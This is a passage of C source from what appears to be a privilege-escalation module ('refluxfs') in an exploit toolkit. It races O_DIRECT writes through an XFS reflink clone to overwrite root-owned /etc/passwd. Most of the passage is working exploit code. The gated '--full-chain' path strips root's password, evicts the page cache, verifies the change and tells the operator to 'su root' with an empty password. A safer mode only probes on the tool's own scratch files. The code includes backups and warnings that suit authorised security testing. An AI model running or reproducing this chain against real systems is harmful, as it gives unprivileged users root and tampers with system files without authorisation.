/* Child exit codes — mapped to operator-facing messages in exploit(). */
|
|
#define RFX_RC_SHARED_NO_WIN 100 /* shared extent confirmed, race not won */
|
|
#define RFX_RC_NO_SHARE 101 /* could not establish/observe a shared extent */
|
|
#define RFX_RC_SHARED_WIN 102 /* shared extent confirmed AND donor diverged */
|
|
#define RFX_RC_SETUP_FAIL 103 /* no usable scratch dir / O_DIRECT unavailable */
|
|
|
|
struct rfx_race {
|
|
char clone_path[PATH_MAX];
|
|
atomic_int gate; /* 0 = hold, 1 = go */
|
|
atomic_int stop; /* helpers exit when set */
|
|
};
|
|
|
|
static void *rfx_writer_fn(void *arg)
|
|
{
|
|
struct rfx_race *r = (struct rfx_race *)arg;
|
|
int fd = open(r->clone_path, O_RDWR | O_DIRECT);
|
|
if (fd < 0) return NULL;
|
|
|
|
void *buf = NULL;
|
|
if (posix_memalign(&buf, RFX_ALIGN, RFX_BLK) != 0) { close(fd); return NULL; }
|
|
memset(buf, RFX_ATTACKER_BYTE, RFX_BLK);
|
|
|
|
while (!atomic_load_explicit(&r->gate, memory_order_acquire))
|
|
sched_yield();
|
|
(void)pwrite(fd, buf, RFX_BLK, 0);
|
|
|
|
free(buf);
|
|
close(fd);
|
|
return NULL;
|
|
}
|
|
|
|
/* Keep the transaction allocator busy so the ILOCK keeps getting dropped while
|
|
* waiting for log space. Sizes alternate between one and two blocks — both keep
|
|
* byte range [0, RFX_BLK) intact, so the racing writers' target never moves. */
|
|
static void *rfx_helper_fn(void *arg)
|
|
{
|
|
struct rfx_race *r = (struct rfx_race *)arg;
|
|
int fd = open(r->clone_path, O_RDWR);
|
|
if (fd < 0) return NULL;
|
|
|
|
while (!atomic_load_explicit(&r->gate, memory_order_acquire))
|
|
sched_yield();
|
|
while (!atomic_load_explicit(&r->stop, memory_order_acquire)) {
|
|
(void)ftruncate(fd, (off_t)RFX_BLK * 2);
|
|
(void)fdatasync(fd);
|
|
(void)ftruncate(fd, (off_t)RFX_BLK);
|
|
(void)fdatasync(fd);
|
|
}
|
|
close(fd);
|
|
return NULL;
|
|
}
|
|
|
|
/* Read `path`'s first block with O_DIRECT and report whether every byte still
|
|
* equals `expect`. Returns 1 if the content diverged, 0 if intact, -1 if we
|
|
* could not tell. O_DIRECT matters: the corruption lands under the inode, so a
|
|
* buffered read would return the stale (correct-looking) cached page. */
|
|
static int rfx_content_diverged(const char *path, unsigned char expect)
|
|
{
|
|
int fd = open(path, O_RDONLY | O_DIRECT);
|
|
if (fd < 0) return -1;
|
|
|
|
void *buf = NULL;
|
|
if (posix_memalign(&buf, RFX_ALIGN, RFX_BLK) != 0) { close(fd); return -1; }
|
|
|
|
int rc = -1;
|
|
ssize_t n = pread(fd, buf, RFX_BLK, 0);
|
|
if (n == (ssize_t)RFX_BLK) {
|
|
const unsigned char *p = (const unsigned char *)buf;
|
|
rc = 0;
|
|
for (size_t i = 0; i < RFX_BLK; i++) {
|
|
if (p[i] != expect) { rc = 1; break; }
|
|
}
|
|
}
|
|
free(buf);
|
|
close(fd);
|
|
return rc;
|
|
}
|
|
|
|
/* Does `path`'s first extent report FIEMAP_EXTENT_SHARED? 1 = yes (refcount>1),
|
|
* 0 = no, -1 = could not tell. */
|
|
static int rfx_extent_is_shared(const char *path)
|
|
{
|
|
int fd = open(path, O_RDONLY);
|
|
if (fd < 0) return -1;
|
|
|
|
struct rfx_fiemap_req req;
|
|
memset(&req, 0, sizeof req);
|
|
req.hdr.fm_start = 0;
|
|
req.hdr.fm_length = RFX_BLK;
|
|
req.hdr.fm_flags = RFX_FIEMAP_FLAG_SYNC;
|
|
req.hdr.fm_extent_count = RFX_FIEMAP_MAX_EXTENTS;
|
|
|
|
int rc = -1;
|
|
if (ioctl(fd, RFX_FS_IOC_FIEMAP, &req) == 0) {
|
|
rc = 0;
|
|
uint32_t n = req.hdr.fm_mapped_extents;
|
|
if (n > RFX_FIEMAP_MAX_EXTENTS) n = RFX_FIEMAP_MAX_EXTENTS;
|
|
for (uint32_t i = 0; i < n; i++) {
|
|
if (req.ext[i].fe_flags & RFX_FIEMAP_EXTENT_SHARED) { rc = 1; break; }
|
|
}
|
|
}
|
|
close(fd);
|
|
return rc;
|
|
}
|
|
|
|
/* Build donor + reflinked clone inside `scratch`. Returns 0 on success. */
|
|
static int rfx_build_pair(const char *scratch, char *donor, size_t dsz,
|
|
char *clone, size_t csz)
|
|
{
|
|
snprintf(donor, dsz, "%s/donor", scratch);
|
|
snprintf(clone, csz, "%s/clone", scratch);
|
|
|
|
int dfd = open(donor, O_RDWR | O_CREAT | O_TRUNC, 0600);
|
|
if (dfd < 0) return -1;
|
|
|
|
void *buf = NULL;
|
|
if (posix_memalign(&buf, RFX_ALIGN, RFX_BLK) != 0) { close(dfd); return -1; }
|
|
memset(buf, RFX_DONOR_BYTE, RFX_BLK);
|
|
ssize_t w = pwrite(dfd, buf, RFX_BLK, 0);
|
|
free(buf);
|
|
if (w != (ssize_t)RFX_BLK) { close(dfd); return -1; }
|
|
(void)fsync(dfd);
|
|
|
|
int cfd = open(clone, O_RDWR | O_CREAT | O_TRUNC, 0600);
|
|
if (cfd < 0) { close(dfd); return -1; }
|
|
|
|
/* The shared extent. This — and only this — is the state the bug's stale
|
|
* refcount lookup misjudges. */
|
|
int rc = ioctl(cfd, RFX_FICLONE, dfd) == 0 ? 0 : -1;
|
|
(void)fsync(cfd);
|
|
close(cfd);
|
|
close(dfd);
|
|
return rc;
|
|
}
|
|
|
|
static void rfx_remove_scratch(const char *scratch)
|
|
{
|
|
DIR *d = opendir(scratch);
|
|
if (d) {
|
|
struct dirent *e;
|
|
while ((e = readdir(d)) != NULL) {
|
|
if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
|
|
unlinkat(dirfd(d), e->d_name, 0);
|
|
}
|
|
closedir(d);
|
|
}
|
|
rmdir(scratch);
|
|
}
|
|
|
|
/* One race round against our own clone. Returns 1 if the donor's on-disk bytes
|
|
* diverged (the race was won), 0 if intact, -1 if undetermined. */
|
|
static int rfx_race_round(const char *donor, const char *clone)
|
|
{
|
|
struct rfx_race r;
|
|
memset(&r, 0, sizeof r);
|
|
snprintf(r.clone_path, sizeof r.clone_path, "%s", clone);
|
|
|
|
pthread_t w[RFX_RACE_WRITERS], h[RFX_RACE_HELPERS];
|
|
int nw = 0, nh = 0;
|
|
|
|
for (int i = 0; i < RFX_RACE_WRITERS; i++)
|
|
if (pthread_create(&w[nw], NULL, rfx_writer_fn, &r) == 0) nw++;
|
|
for (int i = 0; i < RFX_RACE_HELPERS; i++)
|
|
if (pthread_create(&h[nh], NULL, rfx_helper_fn, &r) == 0) nh++;
|
|
|
|
if (nw == 0) {
|
|
atomic_store_explicit(&r.stop, 1, memory_order_release);
|
|
atomic_store_explicit(&r.gate, 1, memory_order_release);
|
|
for (int i = 0; i < nh; i++) pthread_join(h[i], NULL);
|
|
return -1;
|
|
}
|
|
|
|
/* Let every thread reach its spin gate, then release them together. */
|
|
usleep(2000);
|
|
atomic_store_explicit(&r.gate, 1, memory_order_release);
|
|
|
|
for (int i = 0; i < nw; i++) pthread_join(w[i], NULL);
|
|
atomic_store_explicit(&r.stop, 1, memory_order_release);
|
|
for (int i = 0; i < nh; i++) pthread_join(h[i], NULL);
|
|
|
|
return rfx_content_diverged(donor, RFX_DONOR_BYTE);
|
|
}
|
|
|
|
/* ==================================================================
|
|
* Full chain (gated behind --full-chain): the real /etc/passwd root pop.
|
|
*
|
|
* This is the destructive path. It reflink-clones a root-owned target the
|
|
* caller can only READ (default /etc/passwd), races concurrent O_DIRECT
|
|
* writes against the clone, and — when the race is won — the write lands on
|
|
* the target's still-shared on-disk block, rewriting the target itself. The
|
|
* payload strips root's password field (root:x:... -> root::...), exactly the
|
|
* public PoC's technique ("strip root password protection"), so `su root`
|
|
* with an empty password yields uid 0. It PRESERVES every other line of the
|
|
* file byte-for-byte, so no account — least of all the invoking user or sshd —
|
|
* is ever dropped; a naive port that truncates the tail bricks login on the
|
|
* target. It backs the target up first and restores on any failure; cleanup()
|
|
* restores too (run as root after the pop).
|
|
*
|
|
* Exploitability constraint discovered during VM verification (see MODULE.md):
|
|
* the race only fires when the target's extent refcount is exactly the
|
|
* attacker-clone pair, i.e. the target's extent must be PRIVATE going in. A
|
|
* file that is ALREADY reflink-shared with a third file (some fresh cloud
|
|
* images ship /etc/passwd that way) keeps a post-CoW refcount > 1 and is NOT
|
|
* attackable via that target. detect()/here check and report this.
|
|
* ================================================================== */
|
|
#define RFX_FC_WRITERS 32 /* full PoC parameters — no under-driving on the opt-in path */
|
|
#define RFX_FC_HELPERS 8
|
|
#define RFX_FC_BUDGET_SECS 90 /* generous but bounded; a private-extent target falls in seconds-to-a-minute */
|
|
#define RFX_FC_RC_OK 110 /* target overwritten AND verified passwordless-root */
|
|
#define RFX_FC_RC_NOWIN 111 /* race not won in budget (target unchanged) */
|
|
#define RFX_FC_RC_SETUP 112 /* couldn't set up (no xfs scratch, FICLONE refused, craft failed) */
|
|
#define RFX_FC_RC_CORRUPT 113 /* target changed but not to our verified payload — restored from backup */
|
|
|
|
static skeletonkey_result_t refluxfs_exploit_safe(const struct skeletonkey_ctx *ctx);
|
|
|
|
static const char *rfx_fc_target(void)
|
|
{
|
|
const char *t = getenv("SKELETONKEY_REFLUXFS_TARGET"); /* test override */
|
|
return (t && *t) ? t : "/etc/passwd";
|
|
}
|
|
|
|
/* Read up to `cap` bytes of `path`. Returns byte count, or -1. */
|
|
static ssize_t rfx_slurp(const char *path, unsigned char *buf, size_t cap)
|
|
{
|
|
int fd = open(path, O_RDONLY);
|
|
if (fd < 0) return -1;
|
|
ssize_t n = pread(fd, buf, cap, 0);
|
|
close(fd);
|
|
return n;
|
|
}
|
|
|
|
/* Read `path`'s first block straight off disk (O_DIRECT), zero-filled.
|
|
* Returns 0 and sets *got to the byte count, or -1. */
|
|
static int rfx_read_block_odirect(const char *path, unsigned char *out, size_t *got)
|
|
{
|
|
int fd = open(path, O_RDONLY | O_DIRECT);
|
|
if (fd < 0) return -1;
|
|
void *buf = NULL;
|
|
if (posix_memalign(&buf, RFX_ALIGN, RFX_BLK) != 0) { close(fd); return -1; }
|
|
memset(buf, 0, RFX_BLK);
|
|
ssize_t n = pread(fd, buf, RFX_BLK, 0);
|
|
if (n > 0) memcpy(out, buf, RFX_BLK);
|
|
if (got) *got = n > 0 ? (size_t)n : 0;
|
|
free(buf);
|
|
close(fd);
|
|
return n > 0 ? 0 : -1;
|
|
}
|
|
|
|
/* Craft the payload block: copy `orig` (orig_len bytes, must be <= RFX_BLK,
|
|
* i.e. the root line lives in the first block) and empty the root line's
|
|
* password field (root:<pw>: -> root::). Pad with '\n' to exactly orig_len so
|
|
* the on-disk file size is unchanged, then fill the rest of the block with
|
|
* '\n'. Writes RFX_BLK bytes into `out`. Returns 0 on success.
|
|
*
|
|
* Refuses (returns -1) unless the result still contains the root line with an
|
|
* empty password AND the invoking user's line — we NEVER emit a passwd that
|
|
* would lock the caller out. */
|
|
static int rfx_craft_stripped_root(const unsigned char *orig, size_t orig_len,
|
|
const char *myuser, unsigned char *out)
|
|
{
|
|
if (orig_len == 0 || orig_len > RFX_BLK) return -1;
|
|
|
|
char tmp[RFX_BLK + 1];
|
|
memcpy(tmp, orig, orig_len);
|
|
tmp[orig_len] = '\0';
|
|
if (strlen(tmp) != orig_len) return -1; /* embedded NUL — not a passwd file */
|
|
|
|
char *rl = (strncmp(tmp, "root:", 5) == 0) ? tmp : NULL;
|
|
if (!rl) { char *p = strstr(tmp, "\nroot:"); if (p) rl = p + 1; }
|
|
if (!rl) return -1;
|
|
|
|
char *c1 = strchr(rl, ':'); /* end of "root" */
|
|
if (!c1) return -1;
|
|
char *c2 = strchr(c1 + 1, ':'); /* end of password field */
|
|
if (!c2) return -1;
|
|
|
|
/* Shift the tail left, deleting the password field's bytes. */
|
|
memmove(c1 + 1, c2, strlen(c2) + 1);
|
|
if (c1[1] != ':') return -1; /* field must now be empty */
|
|
size_t newlen = strlen(tmp);
|
|
|
|
/* The invoking user's line must survive. */
|
|
if (myuser && *myuser) {
|
|
char needle[96];
|
|
int n = snprintf(needle, sizeof needle, "%s:", myuser);
|
|
if (n <= 0 || (size_t)n >= sizeof needle) return -1;
|
|
int present = (strncmp(tmp, needle, (size_t)n) == 0);
|
|
if (!present) {
|
|
char nl[98];
|
|
snprintf(nl, sizeof nl, "\n%s", needle);
|
|
present = strstr(tmp, nl) != NULL;
|
|
}
|
|
if (!present) return -1;
|
|
}
|
|
|
|
memcpy(out, tmp, newlen);
|
|
for (size_t i = newlen; i < orig_len; i++) out[i] = '\n'; /* keep file size */
|
|
for (size_t i = orig_len; i < RFX_BLK; i++) out[i] = '\n'; /* pad the block */
|
|
return 0;
|
|
}
|
|
|
|
struct rfx_fc_race {
|
|
char clone_path[PATH_MAX];
|
|
const unsigned char *payload; /* RFX_BLK bytes */
|
|
atomic_int gate;
|
|
atomic_int stop;
|
|
};
|
|
|
|
static void *rfx_fc_writer_fn(void *arg)
|
|
{
|
|
struct rfx_fc_race *r = arg;
|
|
int fd = open(r->clone_path, O_RDWR | O_DIRECT);
|
|
if (fd < 0) return NULL;
|
|
void *buf = NULL;
|
|
if (posix_memalign(&buf, RFX_ALIGN, RFX_BLK) != 0) { close(fd); return NULL; }
|
|
memcpy(buf, r->payload, RFX_BLK);
|
|
while (!atomic_load_explicit(&r->gate, memory_order_acquire)) sched_yield();
|
|
(void)pwrite(fd, buf, RFX_BLK, 0);
|
|
free(buf);
|
|
close(fd);
|
|
return NULL;
|
|
}
|
|
|
|
static void *rfx_fc_helper_fn(void *arg)
|
|
{
|
|
struct rfx_fc_race *r = arg;
|
|
int fd = open(r->clone_path, O_RDWR);
|
|
if (fd < 0) return NULL;
|
|
while (!atomic_load_explicit(&r->gate, memory_order_acquire)) sched_yield();
|
|
while (!atomic_load_explicit(&r->stop, memory_order_acquire)) {
|
|
(void)ftruncate(fd, (off_t)RFX_BLK * 2); (void)fdatasync(fd);
|
|
(void)ftruncate(fd, (off_t)RFX_BLK); (void)fdatasync(fd);
|
|
}
|
|
close(fd);
|
|
return NULL;
|
|
}
|
|
|
|
/* One full-chain round: reflink-clone `target` into `clone`, race writers that
|
|
* push `payload` at the clone while helpers churn, then check whether the
|
|
* target's first `cmplen` on-disk bytes changed. Returns 1 (changed), 0
|
|
* (intact), -1 (setup error). */
|
|
static int rfx_fc_round(const char *target, const char *clone,
|
|
const unsigned char *payload,
|
|
const unsigned char *orig_fb, size_t cmplen)
|
|
{
|
|
int sfd = open(target, O_RDONLY);
|
|
if (sfd < 0) return -1;
|
|
unlink(clone);
|
|
int cfd = open(clone, O_RDWR | O_CREAT | O_TRUNC, 0600);
|
|
if (cfd < 0) { close(sfd); return -1; }
|
|
int cl = ioctl(cfd, RFX_FICLONE, sfd);
|
|
close(cfd); close(sfd);
|
|
if (cl != 0) return -1;
|
|
|
|
struct rfx_fc_race r;
|
|
memset(&r, 0, sizeof r);
|
|
snprintf(r.clone_path, sizeof r.clone_path, "%s", clone);
|
|
r.payload = payload;
|
|
|
|
pthread_t w[RFX_FC_WRITERS], h[RFX_FC_HELPERS];
|
|
int nw = 0, nh = 0;
|
|
for (int i = 0; i < RFX_FC_WRITERS; i++)
|
|
if (pthread_create(&w[nw], NULL, rfx_fc_writer_fn, &r) == 0) nw++;
|
|
for (int i = 0; i < RFX_FC_HELPERS; i++)
|
|
if (pthread_create(&h[nh], NULL, rfx_fc_helper_fn, &r) == 0) nh++;
|
|
if (nw == 0) {
|
|
atomic_store_explicit(&r.stop, 1, memory_order_release);
|
|
atomic_store_explicit(&r.gate, 1, memory_order_release);
|
|
for (int i = 0; i < nh; i++) pthread_join(h[i], NULL);
|
|
return -1;
|
|
}
|
|
usleep(1500);
|
|
atomic_store_explicit(&r.gate, 1, memory_order_release);
|
|
for (int i = 0; i < nw; i++) pthread_join(w[i], NULL);
|
|
atomic_store_explicit(&r.stop, 1, memory_order_release);
|
|
for (int i = 0; i < nh; i++) pthread_join(h[i], NULL);
|
|
|
|
unsigned char now[RFX_BLK];
|
|
size_t got = 0;
|
|
if (rfx_read_block_odirect(target, now, &got) != 0) return -1;
|
|
size_t n = cmplen < got ? cmplen : got;
|
|
return memcmp(now, orig_fb, n) != 0 ? 1 : 0;
|
|
}
|
|
|
|
/* Byte-copy src -> dst (0600). Returns 0 on success. */
|
|
static int rfx_copy_file(const char *src, const char *dst)
|
|
{
|
|
unsigned char buf[RFX_BLK];
|
|
int in = open(src, O_RDONLY);
|
|
if (in < 0) return -1;
|
|
int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0600);
|
|
if (out < 0) { close(in); return -1; }
|
|
ssize_t n;
|
|
int rc = 0;
|
|
while ((n = read(in, buf, sizeof buf)) > 0) {
|
|
if (write(out, buf, (size_t)n) != n) { rc = -1; break; }
|
|
}
|
|
if (n < 0) rc = -1;
|
|
(void)fsync(out);
|
|
close(in); close(out);
|
|
return rc;
|
|
}
|
|
|
|
static void rfx_fc_backup_path(const char *dir, char *out, size_t cap)
|
|
{
|
|
snprintf(out, cap, "%s/" RFX_SCRATCH_PREFIX "passwd.bak", dir);
|
|
}
|
|
|
|
/* Evict `target`'s cached pages so subsequent BUFFERED readers (getpwnam in
|
|
* `su`/`login`, `cat`, ...) see the freshly-overwritten on-disk bytes rather
|
|
* than the stale page cache. The RefluXFS write lands on the shared physical
|
|
* block WITHOUT going through the target inode, so its clean cached pages are
|
|
* never invalidated by the kernel — without this eviction a `su` immediately
|
|
* after the pop would read the OLD passwd and fail. POSIX_FADV_DONTNEED needs
|
|
* only an O_RDONLY fd, which an unprivileged attacker has. */
|
|
static void rfx_evict_cache(const char *target)
|
|
{
|
|
int fd = open(target, O_RDONLY);
|
|
if (fd < 0) return;
|
|
(void)posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
|
|
close(fd);
|
|
}
|
|
|
|
/* Does the target's root line have an empty password field on DISK right now?
|
|
* Reads via O_DIRECT: a buffered read would be served from the stale page cache
|
|
* (the overwrite bypasses the inode), so it must not be used to verify a win. */
|
|
static int rfx_target_root_passwordless(const char *target)
|
|
{
|
|
unsigned char b[RFX_BLK]; size_t got = 0;
|
|
if (rfx_read_block_odirect(target, b, &got) != 0 || got == 0) return 0;
|
|
size_t n = got < RFX_BLK ? got : RFX_BLK - 1;
|
|
b[n] = '\0';
|
|
char *rl = (strncmp((char *)b, "root:", 5) == 0) ? (char *)b : NULL;
|
|
if (!rl) { char *p = strstr((char *)b, "\nroot:"); if (p) rl = p + 1; }
|
|
if (!rl) return 0;
|
|
return strncmp(rl, "root::", 6) == 0;
|
|
}
|
|
|
|
static skeletonkey_result_t refluxfs_exploit_fullchain(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
const char *target = rfx_fc_target();
|
|
|
|
struct stat tst;
|
|
if (stat(target, &tst) != 0) {
|
|
fprintf(stderr, "[-] refluxfs: full-chain target %s not found\n", target);
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
if (tst.st_uid != 0 && !getenv("SKELETONKEY_REFLUXFS_TARGET")) {
|
|
fprintf(stderr, "[-] refluxfs: %s is not root-owned (uid=%u) — "
|
|
"overwriting it would not yield root; refusing\n",
|
|
target, (unsigned)tst.st_uid);
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
if ((size_t)tst.st_size == 0 || (size_t)tst.st_size > RFX_BLK) {
|
|
fprintf(stderr, "[-] refluxfs: %s is %lld bytes; this full-chain writes "
|
|
"only the first %u-byte block (the root line lives there) "
|
|
"— larger targets are not supported\n",
|
|
target, (long long)tst.st_size, RFX_BLK);
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
|
|
char dir[RFX_DIR_MAX];
|
|
bool assumed = false;
|
|
if (!rfx_find_xfs_dir(dir, sizeof dir, &assumed)) {
|
|
fprintf(stderr, "[-] refluxfs: no writable XFS scratch dir for the clone\n");
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
|
|
/* Craft the payload up front so we bail BEFORE touching anything if we
|
|
* cannot safely produce a passwd that keeps the caller (and root) intact. */
|
|
unsigned char orig[RFX_BLK];
|
|
ssize_t orig_len = rfx_slurp(target, orig, RFX_BLK);
|
|
if (orig_len <= 0) {
|
|
fprintf(stderr, "[-] refluxfs: cannot read %s\n", target);
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
struct passwd *pw = getpwuid(getuid());
|
|
const char *myuser = pw ? pw->pw_name : NULL;
|
|
unsigned char payload[RFX_BLK];
|
|
if (rfx_craft_stripped_root(orig, (size_t)orig_len, myuser, payload) != 0) {
|
|
fprintf(stderr, "[-] refluxfs: refusing to run — could not craft a "
|
|
"%s payload that keeps root and '%s' intact (unexpected "
|
|
"format?). Nothing was touched.\n",
|
|
target, myuser ? myuser : "?");
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[!] refluxfs: --full-chain — DESTRUCTIVE. This rewrites "
|
|
"%s on disk (stripping root's password) via the reflink "
|
|
"CoW race. It preserves every other line, backs the file "
|
|
"up first, and restores on failure, but a persistent "
|
|
"on-disk overwrite of a system file is inherently risky. "
|
|
"Run only where you are authorised to.\n", target);
|
|
if (rfx_extent_is_shared(target) == 1)
|
|
fprintf(stderr, "[!] refluxfs: %s's extent is ALREADY reflink-shared "
|
|
"— its post-CoW refcount stays > 1, so this target is "
|
|
"likely NOT attackable (the race needs a private "
|
|
"extent). Proceeding but expect no win; see MODULE.md."
|
|
"\n", target);
|
|
}
|
|
|
|
/* Back the target up so cleanup()/failure can restore it. */
|
|
char backup[RFX_DIR_MAX + 64];
|
|
rfx_fc_backup_path(dir, backup, sizeof backup);
|
|
if (rfx_copy_file(target, backup) != 0) {
|
|
fprintf(stderr, "[-] refluxfs: could not back up %s to %s — refusing to "
|
|
"proceed without a restore path\n", target, backup);
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[*] refluxfs: backed up %s -> %s. Race: %d writers / %d "
|
|
"helpers / %ds budget against a clone of %s.\n",
|
|
target, backup, RFX_FC_WRITERS, RFX_FC_HELPERS,
|
|
RFX_FC_BUDGET_SECS, target);
|
|
|
|
unsigned char orig_fb[RFX_BLK];
|
|
size_t fbgot = 0;
|
|
if (rfx_read_block_odirect(target, orig_fb, &fbgot) != 0) {
|
|
fprintf(stderr, "[-] refluxfs: cannot O_DIRECT-read %s\n", target);
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
size_t cmplen = (size_t)orig_len;
|
|
|
|
char scratch[RFX_SCRATCH_MAX];
|
|
snprintf(scratch, sizeof scratch, "%s/" RFX_SCRATCH_PREFIX "fc.XXXXXX", dir);
|
|
if (!mkdtemp(scratch)) {
|
|
fprintf(stderr, "[-] refluxfs: mkdtemp failed\n");
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
char clone[PATH_MAX];
|
|
snprintf(clone, sizeof clone, "%s/clone", scratch);
|
|
|
|
long rounds = 0;
|
|
int won = 0;
|
|
time_t deadline = time(NULL) + RFX_FC_BUDGET_SECS;
|
|
while (time(NULL) < deadline && !won) {
|
|
int d = rfx_fc_round(target, clone, payload, orig_fb, cmplen);
|
|
if (d < 0) break;
|
|
rounds++;
|
|
if (d == 1) won = 1;
|
|
if (!ctx->json && (rounds % 500) == 0)
|
|
fprintf(stderr, "[*] refluxfs: ... %ld rounds\n", rounds);
|
|
}
|
|
unlink(clone);
|
|
rfx_remove_scratch(scratch);
|
|
|
|
if (!won) {
|
|
/* Target should be untouched. If it is, drop the now-redundant backup;
|
|
* if it somehow changed, restore from it and keep nothing stale. */
|
|
unsigned char now[RFX_BLK]; size_t g = 0;
|
|
int changed = (rfx_read_block_odirect(target, now, &g) == 0 &&
|
|
memcmp(now, orig_fb, cmplen) != 0);
|
|
if (changed) (void)rfx_copy_file(backup, target); /* best-effort restore */
|
|
unlink(backup);
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[-] refluxfs: full-chain did not win in %ld rounds / "
|
|
"%ds — %s %s. If its extent was pre-shared this target "
|
|
"is not attackable; otherwise retry.\n",
|
|
rounds, RFX_FC_BUDGET_SECS, target,
|
|
changed ? "was restored from backup" : "unchanged");
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
|
|
/* Won. Evict the target's stale page cache so both our verify below AND a
|
|
* subsequent `su` read the freshly-overwritten on-disk bytes, not the old
|
|
* cached copy. */
|
|
rfx_evict_cache(target);
|
|
|
|
/* Verify the target now really has a passwordless root line rather than
|
|
* some torn/garbled block — if it's corrupt, restore from backup and fail. */
|
|
if (!rfx_target_root_passwordless(target)) {
|
|
(void)rfx_copy_file(backup, target);
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[!] refluxfs: race changed %s but it did not land a "
|
|
"clean passwordless-root line (torn write) — RESTORED "
|
|
"from backup. Re-run to try again.\n", target);
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[+] refluxfs: ROOT-POP CONFIRMED after %ld rounds — %s "
|
|
"now carries a passwordless root line, written through the "
|
|
"reflink CoW race as uid=%u. Every other account was "
|
|
"preserved.\n", rounds, target, (unsigned)getuid());
|
|
fprintf(stderr, "[+] refluxfs: become root with: su root (empty "
|
|
"password — just press Enter)\n");
|
|
fprintf(stderr, "[i] refluxfs: RESTORE when done — as root run "
|
|
"`skeletonkey --cleanup refluxfs` (or `cp %s %s`). The "
|
|
"overwrite is persistent and survives reboot.\n",
|
|
backup, target);
|
|
}
|
|
return SKELETONKEY_EXPLOIT_OK;
|
|
}
|
|
|
|
/* Dispatcher: --full-chain engages the destructive /etc/passwd root pop;
|
|
* otherwise the safe, own-files reachability trigger. */
|
|
static skeletonkey_result_t refluxfs_exploit(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
skeletonkey_result_t pre = refluxfs_detect(ctx);
|
|
if (pre != SKELETONKEY_VULNERABLE) {
|
|
fprintf(stderr, "[-] refluxfs: detect() says not vulnerable/reachable; "
|
|
"refusing\n");
|
|
return pre;
|
|
}
|
|
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
|
if (is_root) {
|
|
fprintf(stderr, "[i] refluxfs: already running as root — nothing to do\n");
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
if (ctx->full_chain)
|
|
return refluxfs_exploit_fullchain(ctx);
|
|
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: safe reachability trigger (own files "
|
|
"only). Pass --full-chain to engage the real %s "
|
|
"overwrite -> su -> root pop.\n", rfx_fc_target());
|
|
return refluxfs_exploit_safe(ctx);
|
|
}
|
|
|
|
static skeletonkey_result_t refluxfs_exploit_safe(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[*] refluxfs: reconstructed reachability probe — builds "
|
|
"a reflinked pair of files WE OWN in a private scratch "
|
|
"dir, confirms the shared extent via FIEMAP, then races "
|
|
"%d concurrent O_DIRECT writes against the clone (%d "
|
|
"ftruncate/fdatasync helpers, %d rounds, %ds cap) and "
|
|
"stops. It never clones or targets a root-owned file, so "
|
|
"the /etc/passwd overwrite → su → root chain is NOT "
|
|
"bundled.\n",
|
|
RFX_RACE_WRITERS, RFX_RACE_HELPERS, RFX_RACE_ROUNDS,
|
|
RFX_RACE_BUDGET_SECS);
|
|
|
|
/* Fork-isolated for consistency with the corpus's other race triggers.
|
|
* Unlike them, a won race here cannot touch kernel memory — the blast
|
|
* radius is 4 KiB of our own scratch file. */
|
|
pid_t child = fork();
|
|
if (child < 0) { perror("[-] fork"); return SKELETONKEY_TEST_ERROR; }
|
|
|
|
if (child == 0) {
|
|
char dir[RFX_DIR_MAX];
|
|
bool assumed = false;
|
|
if (!rfx_find_xfs_dir(dir, sizeof dir, &assumed)) _exit(RFX_RC_SETUP_FAIL);
|
|
|
|
/* SKELETONKEY_XFS_ASSUME_REFLINK=1 lets an operator assert a target we
|
|
* could not see. If the scratch dir is not actually XFS, say so loudly:
|
|
* btrfs implements FICLONE and reports FIEMAP_EXTENT_SHARED too, so
|
|
* phase A would "confirm" against a filesystem this CVE cannot affect,
|
|
* and a not-won race there is evidence of nothing at all. */
|
|
if (!rfx_dir_is_writable_xfs(dir) && !ctx->json)
|
|
fprintf(stderr, "[!] refluxfs: scratch dir %s is NOT on an XFS "
|
|
"filesystem (proceeding on the "
|
|
"SKELETONKEY_XFS_ASSUME_REFLINK assertion) — the "
|
|
"race cannot fire here regardless of the kernel; "
|
|
"treat the outcome as inconclusive, never as "
|
|
"evidence that a host is patched\n", dir);
|
|
|
|
char scratch[RFX_SCRATCH_MAX];
|
|
snprintf(scratch, sizeof scratch, "%s/" RFX_SCRATCH_PREFIX "XXXXXX", dir);
|
|
if (!mkdtemp(scratch)) _exit(RFX_RC_SETUP_FAIL);
|
|
|
|
char donor[PATH_MAX], clone[PATH_MAX];
|
|
if (rfx_build_pair(scratch, donor, sizeof donor, clone, sizeof clone) != 0) {
|
|
rfx_remove_scratch(scratch);
|
|
_exit(RFX_RC_NO_SHARE);
|
|
}
|
|
|
|
/* Phase A — deterministic, read-only confirmation that the state the
|
|
* bug misjudges exists here.
|
|
*
|
|
* The FICLONE inside rfx_build_pair() already succeeded, and that is
|
|
* the authoritative signal: a shared extent now exists by
|
|
* construction. FIEMAP is CORROBORATION of that refcount state, not
|
|
* the gate — filesystems can report the SHARED flag lazily (only after
|
|
* the extent is committed), and refusing to continue on that alone
|
|
